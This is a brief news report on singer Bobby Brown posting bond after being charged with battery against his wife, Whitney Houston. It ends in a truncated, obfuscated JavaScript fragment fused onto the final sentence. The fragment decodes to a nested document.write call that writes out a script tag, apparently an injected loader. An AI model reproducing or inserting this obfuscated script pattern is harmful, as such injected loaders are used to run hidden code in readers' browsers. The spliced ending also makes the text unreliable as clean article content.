Bobby Brown is free, after posting a two-thousand-dollar bond last night.
He had until midnight to turn himself in on charges he hit his wife, Whitney Houston.
A judge ruled in May there was enough evidence for Brown to stand trial on misdemeanor battery charges. An official with the Fulton County, Georgia, Sheriff's Department says Brown was photographed, fingerprinted and posted bond.
Simple battery is punishable by up to a year in jail and a one-thousand-dollar fine. Normally on a first offense in domestic-violence cases, the charge is dismissed if the defendant gets counseling.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
